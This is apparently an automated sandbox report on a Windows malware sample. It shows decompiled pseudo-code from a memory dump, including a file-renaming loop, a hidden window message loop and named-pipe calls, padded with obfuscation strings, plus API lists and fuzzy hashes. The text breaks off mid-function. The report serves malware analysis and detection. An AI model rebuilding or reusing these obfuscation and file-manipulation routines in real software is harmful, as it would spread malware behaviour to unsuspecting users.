GetLastError.KERNEL32 ref: 00EC2EDE
Arc.GDI32(00000000,00000020,00000040,0000005A,00000011,0000001A,00000033,00000032,00000054), ref: 00EC2EF1
DisconnectNamedPipe.KERNEL32 ref: 00EC2EFD

Strings

04kNDtOwMXwk .i 7QkQO6BqbGkwJn XE,hJVrGHfQbyq wMOknxGI8qhCF3iXhls .dcUy.LzHDzquPOYhm4,XXBTZsMUP3RcE.uDKaF6zxmlIJ6Vb6.f.ukUvP1E5SxVsONlRwVZS0EZB0r3ky0SFhyBAb8WlyicWmq2F6Lnjhy tsinRl5F36mG4Hf6gkrYe82CpecqCjx iO75oCm9CglWGAWIn3JW,EIiw8hZLYmk08y FrZS.lEpd9VXYvrWmN, xrefs: 00EC2E2F
cAvBrlnMFqAT2BN31CWMq,4BRqt TqmuaxBM.uWHDCyU2NVoHG xlKfxmH1cG fc HxWxLvvr0wvDX rR2aFooS0U,aq wKQRVNP.VYCB4GBFcZeD0d2aIDE5mZ0J4osrBcqJtX tFO YpWJN4Kjr,wUyremLF uf a X8Wdve3d9FJ dGwx7CTbmxbmtH 3g lxz4Ibo WJNqke kyB.avIoMm1QwcMuqQQa9q6AoG paUGbz pUw467bhxHSU2Z, xrefs: 00EC2C5C
.LRtp,cc9gtdJEIf6AP uPceVdj2X5Y30jXnkK3qzs79Doak51h0R2pVSaE95hmYYy YRV33DEZ3U gBG.D3UwK gaLBCZzLEhzg,BfFvMTpWilDDQTwT7V45QE.BLmK4wY8h0H5HZstD2 wuRO kVAxb1D jXeKVe9 67z703KGjJ4 0J2ZkiKiXy4AUD m49dZQBKmKG.28NFAsRKiBF6,RD8xTrNjJgms ,MOTEas3zuKmCo c5MihDJ FoPtgdFi, xrefs: 00EC2D4A

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$ByteCharMultiWide$NamedPipe$ConnectDisconnect
String ID: .LRtp,cc9gtdJEIf6AP uPceVdj2X5Y30jXnkK3qzs79Doak51h0R2pVSaE95hmYYy YRV33DEZ3U gBG.D3UwK gaLBCZzLEhzg,BfFvMTpWilDDQTwT7V45QE.BLmK4wY8h0H5HZstD2 wuRO kVAxb1D jXeKVe9 67z703KGjJ4 0J2ZkiKiXy4AUD m49dZQBKmKG.28NFAsRKiBF6,RD8xTrNjJgms ,MOTEas3zuKmCo c5MihDJ FoPtgdFi$04kNDtOwMXwk .i 7QkQO6BqbGkwJn XE,hJVrGHfQbyq wMOknxGI8qhCF3iXhls .dcUy.LzHDzquPOYhm4,XXBTZsMUP3RcE.uDKaF6zxmlIJ6Vb6.f.ukUvP1E5SxVsONlRwVZS0EZB0r3ky0SFhyBAb8WlyicWmq2F6Lnjhy tsinRl5F36mG4Hf6gkrYe82CpecqCjx iO75oCm9CglWGAWIn3JW,EIiw8hZLYmk08y FrZS.lEpd9VXYvrWmN$cAvBrlnMFqAT2BN31CWMq,4BRqt TqmuaxBM.uWHDCyU2NVoHG xlKfxmH1cG fc HxWxLvvr0wvDX rR2aFooS0U,aq wKQRVNP.VYCB4GBFcZeD0d2aIDE5mZ0J4osrBcqJtX tFO YpWJN4Kjr,wUyremLF uf a X8Wdve3d9FJ dGwx7CTbmxbmtH 3g lxz4Ibo WJNqke kyB.avIoMm1QwcMuqQQa9q6AoG paUGbz pUw467bhxHSU2Z
API String ID: 2225262853-2998076242
Opcode ID: 778f96f8b7f0d851446f512ccedbcd49c843e887e39ba920990d77d22bd1e528
Instruction ID: 2b5115e8ebcbfec735f7befa27fc18af8868040d742ce00470f028839842bfd1
Opcode Fuzzy Hash: 778f96f8b7f0d851446f512ccedbcd49c843e887e39ba920990d77d22bd1e528
Instruction Fuzzy Hash: D181D072A40208AFEB21EBA4DD85FAE77B8EB54710F10146EF311BB1D1D6B15E46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EC4B04, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00EC4B04(void* __edx, void* __eflags, void* __fp0) {
				short _v592;
				intOrPtr _v624;
				intOrPtr _v628;
				short _v656;
				char _v664;
				char _v665;
				intOrPtr _v676;
				char _v680;
				intOrPtr _v684;
				WCHAR* _v688;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t26;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t33;
				void* _t36;
				void* _t40;
				void* _t44;
				intOrPtr _t53;
				intOrPtr _t54;
				void* _t59;
				void* _t66;
				void* _t68;
				void* _t80;
				void* _t84;
				signed int _t85;
				void* _t87;
				void* _t88;
				void* _t104;

				_t104 = __fp0;
				_t73 = __edx;
				_t87 = (_t85 & 0xfffffff8) - 0x274;
				_v624 = 1;
				_t20 = E00ED1447(__edx,  *0xef5758, 0x31); // executed
				if(_t20 == 0) {
					L21:
					return _t20;
				}
				_t21 =  *0xef5778; // 0x0
				if(_t21 == 0) {
					_t54 =  *0xef56a8; // 0xf00000
					_t21 = E00ED35D7(0, _t54 + 0xb0);
					 *0xef5778 = _t21;
				}
				_push(0);
				_push(_t21);
				_t22 =  *0xef56a8; // 0xf00000
				_push(L"\\c");
				_t24 = E00ECE9D2(_t22 + 0x438);
				_t88 = _t87 + 0x10;
				_v628 = _t24;
				CreateEnhMetaFileA(0, "SL B lE0PNbSEfCx9nxI 2zcUI4LQFnx, IoPVMqNv987sx7K9AhTXQwcP1w9GxR  CNk7vxWOPSr.81YDhu6lK0WzKAXMP4 0jArFA oAoXzds3rwvFY6oG4cbmiAFx4WAVC2biL.HeTrPlLazpq,B MayDlk7oF5Q76B45zbIiIfxeUrYCmwUPdc553iE 3Uk016bby9tzIJ.53U8YgcyIV0BAYmnGtVVy7MLd2T Zj,9YXs0hcv1E3QZ95gvo 9yOINZV Mw 1h3abrGUkmXYZe 3WrTg z UI yveToSSTDBaX6ja22dAoUf6k7Q80CGlCDrm1CYBQqr n1bksDOxkAwzP XngSn  zAH6C9JC4SjINGJyfFcmG7p Ww5QvuTurY0DGELIfPXBlhFh DL9wYRBUgkFphdOt, Zs7hK8.RuhH2.87ttmJqQpb9ppCXlwdEbiXK KQoJ3OnGqEbasHMrmqARWq2jePiHsiPzACVHWRx 3HEd.,Nt.CfsC2oAqMJoZnVVjU,eLrE.k9qIa3OGFCevsXrntTxgk 7zVjZaPtgJ1Ux3RaDNJSAVblymaQzhSmW4GpFqsxQIVTjWK,B Hg1vrWWTMdESdTc6OwpSAdspKsvFhPLTm0e9fbS 7b3b9,oKC azBOqsv8HwWPs8zQm0eG7uU806wPsOyGH7ngQr7,i.T1 uGb97HoEjC0j9QrkCw3F2zTVVdiKPuCWSih,v8Pa,klMqNFhuTSK7beZTy6ZS oOE5YBrtnUAu2w mcx.Or44.Qgrfs8KNmrLbglQRl7CEfQGuKlVe,nkwE3sRICo.r28wU46KW PTwGZqt rbRjeTr,4mCPYmSVMHFmnuM", 0, 0);
				_t20 = ArcTo(0, 0x1a, 0x52, 0xd, 0x45, 0x3b, 0x43, 0x41, 0x38);
				if(_v680 != 0) {
					while(1) {
						_t26 =  *0xef56a8; // 0xf00000
						_t80 = E00ED341E(_t26 + 0x1878, 0x1388);
						if(_t80 == 0) {
							break;
						}
						_t58 = _v680;
						_t30 = E00ED0B5E(_v680);
						_pop(_t66);
						if(_t30 == 0) {
							_t53 = E00ED34A3(_t66, _t73, _t104, _t58);
							_pop(_t66);
							_v676 = _t53;
						}
						_t31 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t31 + 0x90))(_t80);
						_t33 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t33 + 0x30))(_t80);
						if(_v684 <= 0) {
							break;
						} else {
							E00ECE0AF(_t66, _t73,  &_v664);
							_t36 = E00ED1447(_t73,  *0xef5758, 0x33);
							_pop(_t68);
							if(_t36 != 0) {
								L17:
								__eflags = E00EC67DF(_t68, _t73, _t104, _t58);
								if(__eflags < 0) {
									Arc(0, 0x1b, 0x2f, 0xd, 7, 4, 0x2e, 0x1b, 5);
									break;
								}
								E00ED09E9(_t58, __eflags, _t104);
								continue;
							}
							_t40 = E00ED1447(_t73,  *0xef5758, 0x12);
							_pop(_t68);
							_t98 = _t40;
							if(_t40 != 0 || E00ED3478(_t68, _t98) != 0) {
								_push(E00ECE0AF(_t68, _t73, 0));
								E00ECE17D(0x104,  &_v592, L"%s.%u", _t58);
								_t88 = _t88 + 0xc;
								GetLastError();
								_t44 = E00ECFE78("V j08, Mp6WySP XC cgqhRe1jkZEd6ec5g bqkseSVcqRp1M9vtgmqGJ1jwX EoTabSksbwq.1uTcGYmklbV9MW rqn1r81HrNM W1dS3p1 up7TkW3iAaqP eeOkl4QWoYSyRE3liDWTqp Bbf1ecBN F5yC gO7UlGcuvM 26HjY UuRh C1wp8V6ugzn NytpKZdAqsOKPg OKro0Hoq9NCPsVq1w AE ulTkvLRTW5RsC ptVrNoRE pj3tU90jPu8zFkw sN,CGgjbxfVO7y5 qyq. Ud518HSTql10MM9qN6J0BnLdKj89dYxmPgbF5L0DI73rPO3l fH5VNc,STby  01e3lzD");
								_t84 = 0xf;
								if(_t44 <= _t84) {
									_t84 = _t44;
								}
								_t59 = 0;
								_v665 = 0;
								if(_t84 == 0) {
									L15:
									if(MoveFileW(_v688,  &_v592) != 0) {
										IsValidCodePage(3);
									}
									continue;
								} else {
									do {
										_t12 = _t59 + 0x42; // 0x42
										 *((char*)(_t88 + _t59 + 0x1c)) = _t12;
										MultiByteToWideChar(0, 0,  &_v680, 0xffffffff,  &_v656, 0x20);
										_t59 = _t59 + 1;
									} while (_t59 < _t84);
									goto L15;
								}
							} else {
								goto L17;
							}
						}
					}
					_t20 = E00ECD1EA( &_v680, 0xfffffffe);
				}
			}

0x00ec4b04
0x00ec4b04
0x00ec4b0a
0x00ec4b1b
0x00ec4b23
0x00ec4b2c
0x00ec4d02
0x00ec4d08
0x00ec4d08
0x00ec4b32
0x00ec4b3b
0x00ec4b3d
0x00ec4b48
0x00ec4b4e
0x00ec4b4e
0x00ec4b53
0x00ec4b54
0x00ec4b55
0x00ec4b5f
0x00ec4b65
0x00ec4b6a
0x00ec4b75
0x00ec4b79
0x00ec4b90
0x00ec4b9a
0x00ec4ba0
0x00ec4ba0
0x00ec4bb5
0x00ec4bbb
0x00000000
0x00000000
0x00ec4bc1
0x00ec4bc6
0x00ec4bcb
0x00ec4bce
0x00ec4bd1
0x00ec4bd6
0x00ec4bd7
0x00ec4bd7
0x00ec4bdb
0x00ec4be1
0x00ec4be7
0x00ec4bed
0x00ec4bf5
0x00000000
0x00ec4bfb
0x00ec4bff
0x00ec4c0c
0x00ec4c12
0x00ec4c15
0x00ec4cc7
0x00ec4cce
0x00ec4cd0
0x00ec4cee
0x00000000
0x00ec4cee
0x00ec4cd2
0x00000000
0x00ec4cd2
0x00ec4c23
0x00ec4c29
0x00ec4c2a
0x00ec4c2c
0x00ec4c42
0x00ec4c52
0x00ec4c57
0x00ec4c5a
0x00ec4c65
0x00ec4c6d
0x00ec4c70
0x00ec4c72
0x00ec4c72
0x00ec4c74
0x00ec4c76
0x00ec4c7d
0x00ec4ca3
0x00ec4cb4
0x00ec4cbc
0x00ec4cbc
0x00000000
0x00ec4c7f
0x00ec4c7f
0x00ec4c81
0x00ec4c84
0x00ec4c98
0x00ec4c9e
0x00ec4c9f
0x00000000
0x00ec4c7f
0x00000000
0x00000000
0x00000000
0x00ec4c2c
0x00ec4bf5
0x00ec4cfb
0x00ec4d01

APIs

CreateEnhMetaFileA.GDI32(00000000,SL B lE0PNbSEfCx9nxI 2zcUI4LQFnx, IoPVMqNv987sx7K9AhTXQwcP1w9GxR CNk7vxWOPSr.81YDhu6lK0WzKAXMP4 0jArFA oAoXzds3rwvFY6oG4cbmiAFx4WAVC2biL.HeTrPlLazpq,B MayDlk7oF5Q76B45zbIiIfxeUrYCmwUPdc553iE 3Uk016bby9tzIJ.53U8YgcyIV0BAYmnGtVVy7MLd2T Zj,9YXs0hcv1E3QZ95gvo 9yO,00000000,00000000), ref: 00EC4B79
ArcTo.GDI32(00000000,0000001A,00000052,0000000D,00000045,0000003B,00000043,00000041,00000038), ref: 00EC4B90
GetLastError.KERNEL32 ref: 00EC4C5A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EC4C98
MoveFileW.KERNEL32(?,?), ref: 00EC4CAC
IsValidCodePage.KERNEL32(00000003), ref: 00EC4CBC
Arc.GDI32(00000000,0000001B,0000002F,0000000D,00000007,00000004,0000002E,0000001B,00000005), ref: 00EC4CEE

Strings

SL B lE0PNbSEfCx9nxI 2zcUI4LQFnx, IoPVMqNv987sx7K9AhTXQwcP1w9GxR CNk7vxWOPSr.81YDhu6lK0WzKAXMP4 0jArFA oAoXzds3rwvFY6oG4cbmiAFx4WAVC2biL.HeTrPlLazpq,B MayDlk7oF5Q76B45zbIiIfxeUrYCmwUPdc553iE 3Uk016bby9tzIJ.53U8YgcyIV0BAYmnGtVVy7MLd2T Zj,9YXs0hcv1E3QZ95gvo 9yO, xrefs: 00EC4B6F
%s.%u, xrefs: 00EC4C44
V j08, Mp6WySP XC cgqhRe1jkZEd6ec5g bqkseSVcqRp1M9vtgmqGJ1jwX EoTabSksbwq.1uTcGYmklbV9MW rqn1r81HrNM W1dS3p1 up7TkW3iAaqP eeOkl4QWoYSyRE3liDWTqp Bbf1ecBN F5yC gO7UlGcuvM 26HjY UuRh C1wp8V6ugzn NytpKZdAqsOKPg OKro0Hoq9NCPsVq1w AE ulTkvLRTW5RsC ptVrNoRE pj3tU90j, xrefs: 00EC4C60

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: File$ByteCharCodeCreateErrorLastMetaMoveMultiPageValidWide
String ID: %s.%u$SL B lE0PNbSEfCx9nxI 2zcUI4LQFnx, IoPVMqNv987sx7K9AhTXQwcP1w9GxR CNk7vxWOPSr.81YDhu6lK0WzKAXMP4 0jArFA oAoXzds3rwvFY6oG4cbmiAFx4WAVC2biL.HeTrPlLazpq,B MayDlk7oF5Q76B45zbIiIfxeUrYCmwUPdc553iE 3Uk016bby9tzIJ.53U8YgcyIV0BAYmnGtVVy7MLd2T Zj,9YXs0hcv1E3QZ95gvo 9yO$V j08, Mp6WySP XC cgqhRe1jkZEd6ec5g bqkseSVcqRp1M9vtgmqGJ1jwX EoTabSksbwq.1uTcGYmklbV9MW rqn1r81HrNM W1dS3p1 up7TkW3iAaqP eeOkl4QWoYSyRE3liDWTqp Bbf1ecBN F5yC gO7UlGcuvM 26HjY UuRh C1wp8V6ugzn NytpKZdAqsOKPg OKro0Hoq9NCPsVq1w AE ulTkvLRTW5RsC ptVrNoRE pj3tU90j
API String ID: 718336276-3550886185
Opcode ID: 312a86b330a4a0735b594a72c0921db63554f55d677c6499633ea80e0058835c
Instruction ID: 0f656493045d00cb6e5a2b373ab58774dace0bc6ce3af1cbb35cf063a73f4edf
Opcode Fuzzy Hash: 312a86b330a4a0735b594a72c0921db63554f55d677c6499633ea80e0058835c
Instruction Fuzzy Hash: 9C5178722053006FF320AB61ED46F6A77D8EB10B24F00242EF314FA1E2DBA1CA46C695

Uniqueness

Uniqueness Score: -1.00%

Function 00EC406F, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135
fileregistryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC406F(void* __eflags) {
				struct HINSTANCE__* _v8;
				struct _WNDCLASSEXA _v56;
				char _v84;
				char _v148;
				char _v184;
				void* __edi;
				intOrPtr _t28;
				struct HINSTANCE__* _t29;
				intOrPtr _t32;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t55;
				void* _t56;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t64;
				intOrPtr _t67;
				int _t70;
				struct HINSTANCE__* _t71;

				_t28 =  *0xef56c8; // 0x520f6c8
				_t29 =  *((intOrPtr*)(_t28 + 0x10))(0);
				_t70 = 0x30;
				_v8 = _t29;
				memset( &_v56, 0, _t70);
				_t32 =  *0xef56a8; // 0xf00000
				E00ECE851( &_v148, 1, 0x1e, 0x32, _t32 + 0x648);
				CreateEnhMetaFileA(0, "2XXChITLvTob0G .Oek.LE am1VwTE,.GHKABH,gJ.kdPUFnMOPF4XO3CsRXXsZWUsl9l6SK4iN.5 l7bfEniegV15iZ0ls8AtMRrzcZ3CDRDdUcJSjxATFixE7YRD89ZyDOJxn,MjOyQp199 Uo0tQNUxK6wXOAVPjvxDxvWdP9XsTJJqDlLhHcwJ AD1gkmChLONMcf3XQRVys2jU74L5x0L4o5YmEPQh,mOrz3rgaUyyNpWgEQ ,YsAy3FRuAwbV4CgcxCK8JzhvZ61E6Nm", 0, 0);
				_v56.lpszClassName =  &_v148;
				_v56.cbSize = _t70;
				_t71 = _v8;
				_v56.style = 3;
				_v56.lpfnWndProc = E00EC41EC;
				_v56.hInstance = _t71;
				if(RegisterClassExA( &_v56) != 0) {
					 *0xef56e4 = CreateWindowExA(0,  &_v148,  &_v148, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t71, 0);
					CreateEnhMetaFileA(0, "dCeXhPU,gb.e4pd1K5rvjNrq.GeHWvKaD58iVUaqypZxB6Hmy ocJ2I74ST7RjESf6g,.31z4iCC9.YyaFJs25wnl YXi.sotOdUq6aOzl9SuY3jKUa,qojfk3Hkz79o5N2p,GCNgDEQcZqCenfB4CR5P,tBiU6dDzU9RJxsBNdalcKFwbF,CVuNY5K cTfKCdFAXnaJttNHhr  V Kbkk RoudJB0bE7A7HkcALyAH1acJ qPe9Vluayo.Lzkh77oXo8w 8.9n3wrV98tCN8eeo8P47YSTFyJF5kg5Buk63QQeuyEGjjGfsnME1jEY1Ft7YL5uf9H9dhZftRwmFkEln3N IAU.ltFy Js t.I1TtHL,G4Vqwk 6TGXv4GLDP9TbqjfdlGc2EoNqgkF19dpUIiz,u4MnyxB5ulkquW", 0, 0);
					_t45 =  *0xef56e4; // 0x40356
					if(_t45 == 0) {
						L11:
						_t47 =  *0xef56b0; // 0x520f818
						 *((intOrPtr*)(_t47 + 0x2c))( &_v148, _t71);
						return 0;
					}
					_t50 =  *0xef56b0; // 0x520f818, executed
					 *((intOrPtr*)(_t50 + 0x14))(_t45, 0);
					_t52 =  *0xef56b0; // 0x520f818
					 *((intOrPtr*)(_t52 + 0x18))( *0xef56e4);
					while(1) {
						_t55 =  *0xef56b0; // 0x520f818
						_t56 =  *((intOrPtr*)(_t55 + 0x1c))( &_v84, 0, 0, 0);
						if(_t56 == 0) {
							break;
						}
						if(_t56 == 0xffffffff) {
							Arc(0, 0x12, 0x37, 0x28, 0xd, 0x52, 0x26, 0x38, 0x25);
							L9:
							_t58 =  *0xef56e4; // 0x40356
							if(_t58 != 0) {
								_t59 =  *0xef56b0; // 0x520f818
								 *((intOrPtr*)(_t59 + 0x28))(_t58);
								E00ECD177( &_v184, " w3hawA.RBwUaf6KcEmbZLtODC5yhkZZ1TLVe6E GbAzVYrMV,pe0gbSTmoPch8y3QK 2ql6UIdfl4qqD0nTSuW6AXOn9lpYy14T3t1od9dVUJ AjCF8qomyB8j98tMewizefD7G4S0UgLO,9N6Xx7KSt1fxdxSLSbVEGCJ8dCTCkHV7ddGs.OWl14OjItVdfUi3G UUSLGpKCEVf.sMlvuAWYn  5.az6pmqXK9Vq8u5 6AFnab Ymxbqr6mVFs9UERbZslup6BepO7,W4E8vMk70GdADdRTjpiObXLk0PXps0M9iTT UWLlgyft.k1cnIW9,Irj 4Di  gbThUBGBf o yrOUNeLFkry8WZnIDvX0 .gN.YIhFtiXZlr0Uk,CEluqCx203ai izyEstnQHl,hjq9 crRFVLI4EC7Me5CT1mLBLtSVW0  pSndGyKPAe.zGcEsSZZaE C zf4HnA4VMuoH0suG2.vVeu.YTXft3Cat34QciaCKtK4WOkznF48s73JJQyFPuxb3UfpqfiBtJ2S ZDhqFsPM1RKhs zO,U7YA47 pV1RLC4,YbbqAUreVjJ CWi2lVc34OeHG1I rGpvvICwg7k mB,QQ9rEHPN,hzeKaVAhvPZRE NeH1 PVKiM db69lFQB,Dj9fAp8LQcDtrIEfL3K4,GY579 53cy kOe7OU2ceQjVYaNt7jOpc ueg FEsxns5G4XK2UoJ7jYYcfP0kh CfElFiGWJw2rI ,PvlL8CC2an0vX86PI7TICWD uU3ZYj8 1I.  tSfxNyeu7ggn1kNfNEN C kkY9Ojjts0MVv3N.zck2xX5PUMG6oHPjEod6Kz6gASWfBK3R6myx8 Hya Lsq7hCw3Pc0Wy2OIbW8lH IT 8FVvS6Ix2jABBv7,wZ GJ25QY6drKV0YySs2FAOL5Tk77DbOKwwJj7.HGnCwBLJ,OYCd,THNoDXih1nbTzbb6HZysk3nlRV3U1No PGpd5lfLbdPRtM5xYlOt 1dEy6b 9O8sCTKe1iuwMcJadwDuyQzTDWwD2,,6K2gQSXlWzLLtll73YsuegxfivnRzo51pXOMPD8vEiPRxbxZ5WgPmtIr v,cICHD3xNFrhpyS 36 i2msl0lzF6ucUqzGb6x2jOmJWbGS9fN88K0zCx814f x1L dnJ,zq HMb6kfkJUudo8FkdwA9olcCLP 2nk6p7A41aKeVR18SnzIjzfigwr2j yAMBuloWdZ15YbUCKoG8AG9Ie FRMMxqSzALuxnQJ 8aBNr4Kw7QaMh5Qh3o0l Qj0zLxVg Rpb0 wnAIczrx2mHBlsU7IJ39NA7wi8TH3x8nn47d64TTu3MGEWY 6 3Yv4parf0G1XcLx1Zt4oz5T2iph55YPQhNcunWvlWmF86B3 JXEbYYf3", 0x24);
							}
							goto L11;
						}
						_t64 =  *0xef56b0; // 0x520f818
						 *((intOrPtr*)(_t64 + 0x20))( &_v84);
						_t67 =  *0xef56b0; // 0x520f818
						 *((intOrPtr*)(_t67 + 0x24))( &_v84);
					}
					goto L9;
				}
				IsValidCodePage(0x12);
				goto L9;
			}

0x00ec4078
0x00ec4083
0x00ec4088
0x00ec408a
0x00ec4092
0x00ec4097
0x00ec40ae
0x00ec40c4
0x00ec40cc
0x00ec40d2
0x00ec40d5
0x00ec40de
0x00ec40e5
0x00ec40ec
0x00ec40f5
0x00ec4134
0x00ec4139
0x00ec413b
0x00ec4142
0x00ec41d3
0x00ec41db
0x00ec41e0
0x00ec41e9
0x00ec41e9
0x00ec414a
0x00ec414f
0x00ec4158
0x00ec415d
0x00ec417f
0x00ec4186
0x00ec418b
0x00ec4190
0x00000000
0x00000000
0x00ec4165
0x00ec41a5
0x00ec41ab
0x00ec41ab
0x00ec41b2
0x00ec41b5
0x00ec41ba
0x00ec41cb
0x00ec41d0
0x00000000
0x00ec41b2
0x00ec416b
0x00ec4170
0x00ec4177
0x00ec417c
0x00ec417c
0x00000000
0x00ec4192
0x00ec40f9
0x00000000

APIs

memset.MSVCRT ref: 00EC4092
CreateEnhMetaFileA.GDI32(00000000,2XXChITLvTob0G .Oek.LE am1VwTE,.GHKABH,gJ.kdPUFnMOPF4XO3CsRXXsZWUsl9l6SK4iN.5 l7bfEniegV15iZ0ls8AtMRrzcZ3CDRDdUcJSjxATFixE7YRD89ZyDOJxn,MjOyQp199 Uo0tQNUxK6wXOAVPjvxDxvWdP9XsTJJqDlLhHcwJ AD1gkmChLONMcf3XQRVys2jU74L5x0L4o5YmEPQh,mOrz3rgaUyyNpWgEQ ,YsAy3FRuAwbV4,00000000,00000000), ref: 00EC40C4
RegisterClassExA.USER32(?), ref: 00EC40EF
IsValidCodePage.KERNEL32(00000012), ref: 00EC40F9
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,?,00000000), ref: 00EC4129
CreateEnhMetaFileA.GDI32(00000000,dCeXhPU,gb.e4pd1K5rvjNrq.GeHWvKaD58iVUaqypZxB6Hmy ocJ2I74ST7RjESf6g,.31z4iCC9.YyaFJs25wnl YXi.sotOdUq6aOzl9SuY3jKUa,qojfk3Hkz79o5N2p,GCNgDEQcZqCenfB4CR5P,tBiU6dDzU9RJxsBNdalcKFwbF,CVuNY5K cTfKCdFAXnaJttNHhr V Kbkk RoudJB0bE7A7HkcALyAH1acJ qPe9Vluayo.Lzkh77oXo,00000000,00000000), ref: 00EC4139

Strings

dCeXhPU,gb.e4pd1K5rvjNrq.GeHWvKaD58iVUaqypZxB6Hmy ocJ2I74ST7RjESf6g,.31z4iCC9.YyaFJs25wnl YXi.sotOdUq6aOzl9SuY3jKUa,qojfk3Hkz79o5N2p,GCNgDEQcZqCenfB4CR5P,tBiU6dDzU9RJxsBNdalcKFwbF,CVuNY5K cTfKCdFAXnaJttNHhr V Kbkk RoudJB0bE7A7HkcALyAH1acJ qPe9Vluayo.Lzkh77oXo, xrefs: 00EC412E
w3hawA.RBwUaf6KcEmbZLtODC5yhkZZ1TLVe6E GbAzVYrMV,pe0gbSTmoPch8y3QK 2ql6UIdfl4qqD0nTSuW6AXOn9lpYy14T3t1od9dVUJ AjCF8qomyB8j98tMewizefD7G4S0UgLO,9N6Xx7KSt1fxdxSLSbVEGCJ8dCTCkHV7ddGs.OWl14OjItVdfUi3G UUSLGpKCEVf.sMlvuAWYn 5.az6pmqXK9Vq8u5 6AFnab Ymxbqr6mVFs9UER, xrefs: 00EC41C5
2XXChITLvTob0G .Oek.LE am1VwTE,.GHKABH,gJ.kdPUFnMOPF4XO3CsRXXsZWUsl9l6SK4iN.5 l7bfEniegV15iZ0ls8AtMRrzcZ3CDRDdUcJSjxATFixE7YRD89ZyDOJxn,MjOyQp199 Uo0tQNUxK6wXOAVPjvxDxvWdP9XsTJJqDlLhHcwJ AD1gkmChLONMcf3XQRVys2jU74L5x0L4o5YmEPQh,mOrz3rgaUyyNpWgEQ ,YsAy3FRuAwbV4, xrefs: 00EC40BE

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Create$FileMeta$ClassCodePageRegisterValidWindowmemset
String ID: w3hawA.RBwUaf6KcEmbZLtODC5yhkZZ1TLVe6E GbAzVYrMV,pe0gbSTmoPch8y3QK 2ql6UIdfl4qqD0nTSuW6AXOn9lpYy14T3t1od9dVUJ AjCF8qomyB8j98tMewizefD7G4S0UgLO,9N6Xx7KSt1fxdxSLSbVEGCJ8dCTCkHV7ddGs.OWl14OjItVdfUi3G UUSLGpKCEVf.sMlvuAWYn 5.az6pmqXK9Vq8u5 6AFnab Ymxbqr6mVFs9UER$2XXChITLvTob0G .Oek.LE am1VwTE,.GHKABH,gJ.kdPUFnMOPF4XO3CsRXXsZWUsl9l6SK4iN.5 l7bfEniegV15iZ0ls8AtMRrzcZ3CDRDdUcJSjxATFixE7YRD89ZyDOJxn,MjOyQp199 Uo0tQNUxK6wXOAVPjvxDxvWdP9XsTJJqDlLhHcwJ AD1gkmChLONMcf3XQRVys2jU74L5x0L4o5YmEPQh,mOrz3rgaUyyNpWgEQ ,YsAy3FRuAwbV4$dCeXhPU,gb.e4pd1K5rvjNrq.GeHWvKaD58iVUaqypZxB6Hmy ocJ2I74ST7RjESf6g,.31z4iCC9.YyaFJs25wnl YXi.sotOdUq6aOzl9SuY3jKUa,qojfk3Hkz79o5N2p,GCNgDEQcZqCenfB4CR5P,tBiU6dDzU9RJxsBNdalcKFwbF,CVuNY5K cTfKCdFAXnaJttNHhr V Kbkk RoudJB0bE7A7HkcALyAH1acJ qPe9Vluayo.Lzkh77oXo
API String ID: 78948297-4173916909
Opcode ID: 4d0338d61cca9dd2bf81f165e808cc834c6c9f1c9ff647ca2ca5a28e1721e81e
Instruction ID: c45539bc29236c187efa15f68f4dda0d359abf508393f150bf7c1a2b4ed51df9
Opcode Fuzzy Hash: 4d0338d61cca9dd2bf81f165e808cc834c6c9f1c9ff647ca2ca5a28e1721e81e
Instruction Fuzzy Hash: 54416CB2642618BFD720DF96DD89FEA7FACFB68710F450055F218FA1A1C6709A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00EC9941, Relevance: 13.9, APIs: 9, Instructions: 373
stringfilewindowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00EC9941(void* __ecx, void* __edx, void* __fp0, char _a4) {
				char _v292;
				char _v332;
				char _v336;
				char _v340;
				char _v344;
				intOrPtr _v358;
				intOrPtr _v360;
				signed short _v364;
				intOrPtr _v370;
				WCHAR* _v372;
				char _v376;
				CHAR* _v380;
				CHAR* _v384;
				WCHAR* _v388;
				signed short _v392;
				char _v396;
				WCHAR* _v400;
				char _v424;
				void* __edi;
				void* __esi;
				intOrPtr _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t94;
				WCHAR* _t95;
				char _t99;
				intOrPtr _t100;
				intOrPtr _t106;
				intOrPtr _t109;
				WCHAR* _t110;
				WCHAR* _t116;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t123;
				intOrPtr _t127;
				signed int _t130;
				signed int _t133;
				WCHAR* _t137;
				intOrPtr _t139;
				intOrPtr _t142;
				WCHAR* _t144;
				intOrPtr _t148;
				intOrPtr _t160;
				signed int _t164;
				WCHAR* _t168;
				WCHAR* _t175;
				intOrPtr _t178;
				CHAR* _t186;
				signed int _t195;
				WCHAR* _t196;
				void* _t197;
				intOrPtr _t198;
				intOrPtr _t204;
				signed int _t206;
				void* _t207;
				signed int _t214;
				void* _t215;
				intOrPtr _t217;
				void* _t222;
				struct HDC__* _t227;
				char* _t232;
				signed int _t235;
